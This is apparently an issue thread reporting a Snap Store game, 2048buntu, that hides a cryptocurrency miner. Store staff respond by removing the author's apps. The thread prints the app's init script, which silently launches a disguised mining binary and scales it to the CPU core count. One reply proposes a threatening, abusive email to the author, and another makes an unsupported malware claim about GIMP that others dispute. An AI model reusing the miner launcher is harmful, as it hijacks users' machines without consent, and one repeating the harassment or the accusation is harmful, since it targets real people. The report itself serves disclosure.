How to ask to ban the application for security reasons?

[tarwirdur]

This application contains hidden сrypto-currency miner inside.

• squashfs-root/systemd - miner
• squashfs-root/start - init script:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

I did not find way to complain about the application. Which way is good for it?

[mathe30]

send him a message on the email that says :

[mathe30]

I know your lil dirty secrity , remove the application or I am gonna send this on public and will let your mum know that you are cheap bitch

[sparkiegeek]

Thanks for the report, we're removing these from the store whilst we investigate

[tarwirdur]

@sparkiegeek, note that other application from this author contains miner too. (I've checked only for 2048buntu and hextris, but suppose that other contains it too).

UPD: already deleted. Thank you.

[sparkiegeek]

@tarwirdur yes, we've removed all applications from this author pending further investigations.

Thank you for your vigilance!

[Enerccio]

aww let the poor guy get his ferrari...

[tdemin]

@Enerccio what's the point in being poor and getting a Ferrari?

[oliwarner]

Any plans to push a fake package update that forcibly uninstalls this crap?

[Ads20000]

For future reference the store category on the snapcraft forum is probably the best place to ask for a store removal. Pretty much all the snappy developers watch that forum pretty regularly so you'd possibly get an even swifter response than the one you got here.

Also I've started a topic there asking what action will be taken to make this less likely to happen in the future.

[rliden]

The app is still up in the OP post. Why?

[tarwirdur]

The app is still up in the OP post. Why?

@rliden this app was cured and replaced with cured version.
On victim's computers it should be automatically updated to cured version.

Now you can see 'Snap Quarantine (snap-quarantine)` as the application author.

[ghost]

GNU Image Manipulations Program (GIMP) by Snapcrafters which is another application with this virus is still up on the Ubuntu Store so be careful you install the other GIMP you find. They're trick is to prevent people from commenting or rating on the Ubuntu Store which prevents people from knowing it is a virus.

[Ads20000]

@ultrafractal can you substantiate your claim? I find it very unlikely that GIMP by https://github.com/snapcrafters has this crypto miner. For the snapcrafters GitHub repo and the snapcrafters store account, as far as I'm aware, it's Canonical employees who have write access, so Canonical itself would be culpable if your claim is correct. If you can prove that GIMP by snapcrafters has this crypto miner then please provide your evidence.